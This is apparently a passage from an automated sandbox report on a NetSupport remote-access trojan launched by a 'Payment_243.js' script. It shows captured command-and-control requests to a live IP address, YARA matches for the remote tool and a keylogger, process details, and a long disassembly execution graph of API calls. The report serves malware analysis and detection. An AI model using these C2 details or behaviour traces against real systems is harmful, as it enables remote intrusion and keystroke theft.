                                                                                              Jan 14, 2025 16:25:36.126513004 CET1236INData Raw: 82 43 ab 0f fa 38 f1 f5 be 7c 0f 71 10 55 10 3f 6a 1f 2c 3a 39 c4 a1 80 1f b9 ec 17 c8 1d 4d 3e ed 0e fa bb 35 cf 41 f4 06 6c 42 42 ff 05 5b e5 6d 05 e7 fa 2b 24 42 8f 36 61 53 c7 54 ae 44 86 06 bb 44 56 3b f4 17 8b af 2d be 49 88 35 c4 3c 45 de
                                                                                              Data Ascii: C8|qU?j,:9M>5AlBB[m+$B6aSTDDV;-I5<EA#2|*O2>Q1r$t4vI6?o*@e3F;z `e4j=,?Z=j,Tpf@TU'>hZAx#c-]
                                                                                              Jan 14, 2025 16:25:36.131138086 CET1236INData Raw: 00 f6 56 8d cb 6d 4d 92 8c 7d 2f 5b 70 41 2d 66 32 4d c2 a1 72 c6 de dc 78 58 86 bd 06 4a 3f 38 d0 f4 88 a6 9a f1 05 f8 4f ea 94 5f 9d 9b 55 39 de db b5 53 55 cb 18 5e 5e 1f 08 be b8 73 28 77 9e 88 cb de 14 36 80 ea 30 58 6e f7 09 51 95 88 2d f8
                                                                                              Data Ascii: VmM}/[pA-f2MrxXJ?8O_U9SU^^s(w60XnQ-R#dW(LO21j2`]wK~18dVFx`'$T!/{19<H! TV5B{?0Q(<bfG, Laosl4CWjA


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.2249164185.157.213.714433968C:\ProgramData\i99ekubc\client32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 16:25:49.020201921 CET220OUTPOST http://185.157.213.71/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.157.213.71Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                              Data Raw:
                                                                                              Data Ascii:


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.2249165172.67.68.212803968C:\ProgramData\i99ekubc\client32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 16:25:49.836766005 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                              Host: geo.netsupportsoftware.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Jan 14, 2025 16:25:50.500916004 CET1135INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 14 Jan 2025 15:25:50 GMT
                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              CF-Ray: 901ea414fa9c41de-EWR
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              cf-apo-via: origin,host
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1a0Dx0OGKXHyff4tWOx9huhmxu%2FrfpGODYCY3eCxDk%2BoYOYnaiuMoMz%2Felupk%2BTzjfpiLGxRUjNSSN2%2FaPZ1njy6u0TbmV5Jr%2BA1HNDIEKeTAseAOqNo1O6%2BgdO6dLvCRsR6g%2Fy2fdL0D0%2B"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1577&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.2249166172.67.68.212803968C:\ProgramData\i99ekubc\client32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 16:25:50.617533922 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                              Host: geo.netsupportsoftware.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Jan 14, 2025 16:25:51.294994116 CET1129INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 14 Jan 2025 15:25:51 GMT
                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              CF-Ray: 901ea419dc7059bb-IAD
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              cf-apo-via: origin,host
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSZ%2BRGP%2FBskJ7LnFLn%2BdwOJy8PAomrnw07fCdNdJ0YQbD5EIWgljEF5buCYnwlqPT%2BhhnetsEziM50DbTASpiI6M4oSMzf%2Frv6qXOTbv4t9lpKca36wLWM%2BL6M7ghXFQ93uZQZw11KSih7sn"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8053&min_rtt=8053&rtt_var=4026&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.2249167172.67.68.212803968C:\ProgramData\i99ekubc\client32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 16:25:51.300849915 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                              Host: geo.netsupportsoftware.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Jan 14, 2025 16:25:52.072853088 CET1128INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 14 Jan 2025 15:25:52 GMT
                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              CF-Ray: 901ea41e5c173b74-IAD
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              cf-apo-via: origin,host
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LKEYObFWeGsbhjPcHiwLQ5zFRGBnMAimUDbPlqHud%2F6nLggXW2TDZkaH0QDok7leAQbRybrJDBESoNHc%2BZAPEz9GZdTbMBoHCZ82rfT%2BMeo9JV5oroEorvLVQi948Unz5j7mf%2Bgr4vZZtulj"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=23406&min_rtt=23406&rtt_var=11703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:10:24:41
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
                                                                                              Imagebase:0xff2b0000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:10:25:46
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\ProgramData\i99ekubc\client32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\i99ekubc\client32.exe"
                                                                                              Imagebase:0xa10000
                                                                                              File size:103'824 bytes
                                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644043633.0000000001F93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\client32.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 32%, ReversingLabs
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.7%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:20.4%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:129
                                                                                                execution_graph 88503 11106e70 GetTickCount EnterCriticalSection GetTickCount 88504 11106ec3 88503->88504 88505 11106eb8 88503->88505 88507 11106f3a GetTickCount LeaveCriticalSection 88504->88507 88511 11106ee2 88504->88511 88549 11147060 88505->88549 88508 11106f60 EnterCriticalSection 88507->88508 88509 11106f52 88507->88509 88515 11106f89 88508->88515 88514 11147060 std::locale::facet::_Facet_Register 21 API calls 88509->88514 88510 11106f00 GetTickCount LeaveCriticalSection 88512 11106f23 88510->88512 88513 11106f18 88510->88513 88511->88510 88555 11029a70 265 API calls 2 library calls 88511->88555 88518 11147060 std::locale::facet::_Facet_Register 21 API calls 88513->88518 88519 11106f5d 88514->88519 88520 11106f93 88515->88520 88521 11106fb4 88515->88521 88518->88512 88519->88508 88523 1110702e LeaveCriticalSection 88520->88523 88524 11106f9e 88520->88524 88540 111101b0 88521->88540 88556 11029a70 265 API calls 2 library calls 88524->88556 88528 11106fd7 88531 11106fe4 88528->88531 88532 11106ffb 88528->88532 88529 1110702b 88529->88523 88558 11029a70 265 API calls 2 library calls 88531->88558 88559 1108a2e0 266 API calls 3 library calls 88532->88559 88536 11107010 88560 11149b20 67 API calls std::ios_base::_Ios_base_dtor 88536->88560 88538 1110701f 88539 11147060 std::locale::facet::_Facet_Register 21 API calls 88538->88539 88539->88529 88561 11163a11 88540->88561 88543 11110203 _memset 88578 11162bb7 88543->88578 88544 111101d7 wsprintfA 88586 11029a70 265 API calls 2 library calls 88544->88586 88548 11106fbe 88548->88528 88557 110f1080 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 88548->88557 88550 11147071 88549->88550 88551 1114706c 88549->88551 88596 111464c0 88550->88596 88599 11146270 18 API calls std::locale::facet::_Facet_Register 88551->88599 88557->88528 88559->88536 88560->88538 88562 11163a8e 88561->88562 88569 11163a1f 88561->88569 88593 1116e368 DecodePointer 88562->88593 88564 11163a94 88594 1116a1af 66 API calls __getptd_noexit 88564->88594 88567 11163a4d RtlAllocateHeap 88567->88569 88577 111101ce 88567->88577 88569->88567 88570 11163a7a 88569->88570 88571 11163a2a 88569->88571 88575 11163a78 88569->88575 88590 1116e368 DecodePointer 88569->88590 88591 1116a1af 66 API calls __getptd_noexit 88570->88591 88571->88569 88587 1116e85d 66 API calls __NMSG_WRITE 88571->88587 88588 1116e6ae 66 API calls 6 library calls 88571->88588 88589 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 88571->88589 88592 1116a1af 66 API calls __getptd_noexit 88575->88592 88577->88543 88577->88544 88579 11162bc1 IsDebuggerPresent 88578->88579 88580 11162bbf 88578->88580 88595 111784f7 88579->88595 88580->88548 88583 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 88584 1116cb76 __call_reportfault 88583->88584 88585 1116cb7e GetCurrentProcess TerminateProcess 88583->88585 88584->88585 88585->88548 88587->88571 88588->88571 88590->88569 88591->88575 88592->88577 88593->88564 88594->88577 88595->88583 88600 11146370 88596->88600 88598 111464d2 88598->88504 88599->88550 88601 11146394 88600->88601 88602 11146399 88600->88602 88620 11146270 18 API calls std::locale::facet::_Facet_Register 88601->88620 88604 11146402 88602->88604 88605 111463a2 88602->88605 88606 111464ae 88604->88606 88607 1114640f wsprintfA 88604->88607 88608 111463d9 88605->88608 88611 111463b0 88605->88611 88609 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88606->88609 88610 11146432 88607->88610 88614 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88608->88614 88612 111464ba 88609->88612 88610->88610 88613 11146439 wvsprintfA 88610->88613 88616 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88611->88616 88612->88598 88619 11146454 88613->88619 88615 111463fe 88614->88615 88615->88598 88617 111463d5 88616->88617 88617->88598 88618 111464a1 OutputDebugStringA 88618->88606 88619->88618 88619->88619 88620->88602 88621 a11020 GetCommandLineA 88623 a11035 GetStartupInfoA 88621->88623 88624 a11090 GetModuleHandleA 88623->88624 88625 a1108b 88623->88625 88628 a11000 _NSMClient32 88624->88628 88625->88624 88627 a110a2 ExitProcess 88628->88627 88629 110179e0 GetTickCount 88636 110178f0 88629->88636 88634 11147060 std::locale::facet::_Facet_Register 21 API calls 88635 11017a27 88634->88635 88637 11017910 88636->88637 88638 110179c6 88636->88638 88639 11017932 CoInitialize _GetRawWMIStringW 88637->88639 88641 11017929 WaitForSingleObject 88637->88641 88640 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88638->88640 88642 110179b2 88639->88642 88645 11017965 88639->88645 88643 110179d5 88640->88643 88641->88639 88642->88638 88644 110179c0 CoUninitialize 88642->88644 88649 11017810 88643->88649 88644->88638 88645->88642 88646 110179ac 88645->88646 88662 111648ed 79 API calls __isdigit_l 88645->88662 88663 111646f7 67 API calls __fassign 88646->88663 88650 11017830 88649->88650 88656 110178d6 88649->88656 88651 11017848 CoInitialize _GetRawWMIStringW 88650->88651 88653 1101783f WaitForSingleObject 88650->88653 88657 1101787b 88651->88657 88658 110178c2 88651->88658 88652 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88654 110178e5 SetEvent GetTickCount 88652->88654 88653->88651 88654->88634 88655 110178d0 CoUninitialize 88655->88656 88656->88652 88657->88658 88659 110178bc 88657->88659 88664 111648ed 79 API calls __isdigit_l 88657->88664 88658->88655 88658->88656 88665 111646f7 67 API calls __fassign 88659->88665 88662->88645 88663->88642 88664->88657 88665->88658 88666 110262c0 LoadLibraryA 88667 11031780 88668 1103178e 88667->88668 88672 11146a90 88668->88672 88671 110317af std::locale::facet::_Facet_Register 88675 11145be0 88672->88675 88676 11145bf0 88675->88676 88676->88676 88681 11110230 88676->88681 88678 11145c02 88688 11145b10 88678->88688 88680 1103179f SetUnhandledExceptionFilter 88680->88671 88682 11163a11 _malloc 66 API calls 88681->88682 88683 1111023e 88682->88683 88684 11110247 88683->88684 88685 1111025e _memset 88683->88685 88699 11029a70 265 API calls 2 library calls 88684->88699 88685->88678 88689 11145b27 _strncpy 88688->88689 88690 11145b62 __crtCompareStringA_stat 88688->88690 88689->88689 88691 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88689->88691 88700 11143300 MultiByteToWideChar 88690->88700 88694 11145b5e 88691->88694 88693 11145b94 88701 11143340 WideCharToMultiByte GetLastError 88693->88701 88694->88680 88696 11145ba6 88697 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88696->88697 88698 11145bb9 88697->88698 88698->88680 88700->88693 88701->88696 88702 11041180 88703 110411b2 88702->88703 88704 110411b8 88703->88704 88709 110411d4 88703->88709 88706 110fb470 15 API calls 88704->88706 88705 110412e8 88707 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88705->88707 88708 110411ca CloseHandle 88706->88708 88711 110412f5 88707->88711 88708->88709 88709->88705 88712 1104120d 88709->88712 88734 110881d0 297 API calls 5 library calls 88709->88734 88710 11041268 88724 110fb470 GetTokenInformation 88710->88724 88712->88705 88712->88710 88715 1104127a 88716 11041282 CloseHandle 88715->88716 88719 11041289 88715->88719 88716->88719 88717 110412cb 88720 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88717->88720 88718 110412b1 88721 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88718->88721 88719->88717 88719->88718 88722 110412e4 88720->88722 88723 110412c7 88721->88723 88725 110fb4b8 88724->88725 88726 110fb4a7 88724->88726 88735 110f2300 9 API calls 88725->88735 88727 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88726->88727 88729 110fb4b4 88727->88729 88729->88715 88730 110fb4dc 88730->88726 88731 110fb4e4 88730->88731 88732 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88731->88732 88733 110fb50a 88732->88733 88733->88715 88734->88712 88735->88730 88736 11144dd0 88737 11144de1 88736->88737 88750 111447f0 88737->88750 88741 11144e65 88743 11144e82 88741->88743 88745 11144e64 88741->88745 88742 11144e2b 88744 11144e32 ResetEvent 88742->88744 88758 111449b0 265 API calls 2 library calls 88744->88758 88745->88741 88759 111449b0 265 API calls 2 library calls 88745->88759 88748 11144e46 SetEvent WaitForMultipleObjects 88748->88744 88748->88745 88749 11144e7f 88749->88743 88751 111447fc GetCurrentProcess 88750->88751 88752 1114481f 88750->88752 88751->88752 88753 1114480d GetModuleFileNameA 88751->88753 88754 111101b0 std::locale::facet::_Facet_Register 263 API calls 88752->88754 88757 11144849 WaitForMultipleObjects 88752->88757 88753->88752 88755 1114483b 88754->88755 88755->88757 88760 11144140 GetModuleFileNameA 88755->88760 88757->88741 88757->88742 88758->88748 88759->88749 88761 111441c3 88760->88761 88762 11144183 88760->88762 88764 111441cf LoadLibraryA 88761->88764 88765 111441e9 GetModuleHandleA GetProcAddress 88761->88765 88774 11081e00 88762->88774 88764->88765 88767 111441de LoadLibraryA 88764->88767 88768 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88765->88768 88769 11144209 88765->88769 88766 11144191 88766->88761 88770 11144198 LoadLibraryA 88766->88770 88767->88765 88771 11144243 10 API calls 88768->88771 88769->88771 88770->88761 88772 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 88771->88772 88773 111442c0 88772->88773 88773->88757 88775 11081e13 _strrchr 88774->88775 88777 11081e2a std::locale::facet::_Facet_Register 88775->88777 88778 11081c50 IsDBCSLeadByte 88775->88778 88777->88766 88778->88777 88780 1102ebd0 88781 1102ec13 88780->88781 88782 111101b0 std::locale::facet::_Facet_Register 265 API calls 88781->88782 88783 1102ec1a 88782->88783 88785 1102ec3a 88783->88785 89882 11143630 88783->89882 89206 11143780 88785->89206 88788 1102ec91 88791 11143780 86 API calls 88788->88791 88790 1102ec76 88793 11081e70 86 API calls 88790->88793 88792 1102ecba 88791->88792 88799 1102ecc7 88792->88799 89900 11163ca7 88792->89900 88793->88788 88795 1102ecf6 88796 1102ed68 88795->88796 88797 1102ed4f GetSystemMetrics 88795->88797 88801 1102ed82 CreateEventA 88796->88801 88797->88796 88798 1102ed5e 88797->88798 88800 11147060 std::locale::facet::_Facet_Register 21 API calls 88798->88800 88799->88795 88802 11145c70 std::locale::facet::_Facet_Register 90 API calls 88799->88802 88800->88796 88803 1102ed95 88801->88803 88804 1102eda9 88801->88804 88802->88795 89904 11029a70 265 API calls 2 library calls 88803->89904 88806 111101b0 std::locale::facet::_Facet_Register 265 API calls 88804->88806 88807 1102edb0 88806->88807 88808 1102edd0 88807->88808 89905 11110de0 88807->89905 88810 111101b0 std::locale::facet::_Facet_Register 265 API calls 88808->88810 88811 1102ede4 88810->88811 88812 11110de0 429 API calls 88811->88812 88813 1102ee04 88811->88813 88812->88813 88814 111101b0 std::locale::facet::_Facet_Register 265 API calls 88813->88814 88815 1102ee83 88814->88815 88816 1102eeb3 88815->88816 89933 11061aa0 88815->89933 88818 111101b0 std::locale::facet::_Facet_Register 265 API calls 88816->88818 88819 1102eecd 88818->88819 88820 1102eef2 FindWindowA 88819->88820 89952 11061710 88819->89952 88823 1102f032 88820->88823 88824 1102ef2b 88820->88824 89212 11061ef0 88823->89212 88824->88823 88827 1102ef43 GetWindowThreadProcessId 88824->88827 88829 11147060 std::locale::facet::_Facet_Register 21 API calls 88827->88829 88828 11061ef0 268 API calls 88830 1102f050 88828->88830 88831 1102ef60 OpenProcess 88829->88831 88832 11061ef0 268 API calls 88830->88832 88831->88823 88833 1102ef7d 88831->88833 88834 1102f05c 88832->88834 89965 11094f00 105 API calls 88833->89965 88836 1102f073 88834->88836 88837 1102f06a 88834->88837 89219 111464e0 88836->89219 89966 11028360 119 API calls 2 library calls 88837->89966 88838 1102ef9c 88841 11147060 std::locale::facet::_Facet_Register 21 API calls 88838->88841 88844 1102efb0 88841->88844 88842 1102f06f 88842->88836 88843 1102f082 88845 1102f086 88843->88845 89234 1102a6d0 IsJPIK 88843->89234 88846 1102efef CloseHandle FindWindowA 88844->88846 88850 11147060 std::locale::facet::_Facet_Register 21 API calls 88844->88850 89250 11145990 ExpandEnvironmentStringsA 88845->89250 88847 1102f022 88846->88847 88848 1102f014 GetWindowThreadProcessId 88846->88848 88851 11147060 std::locale::facet::_Facet_Register 21 API calls 88847->88851 88848->88847 88853 1102efc2 SendMessageA WaitForSingleObject 88850->88853 88854 1102f02f 88851->88854 88853->88846 88856 1102efe2 88853->88856 88854->88823 88858 11147060 std::locale::facet::_Facet_Register 21 API calls 88856->88858 88860 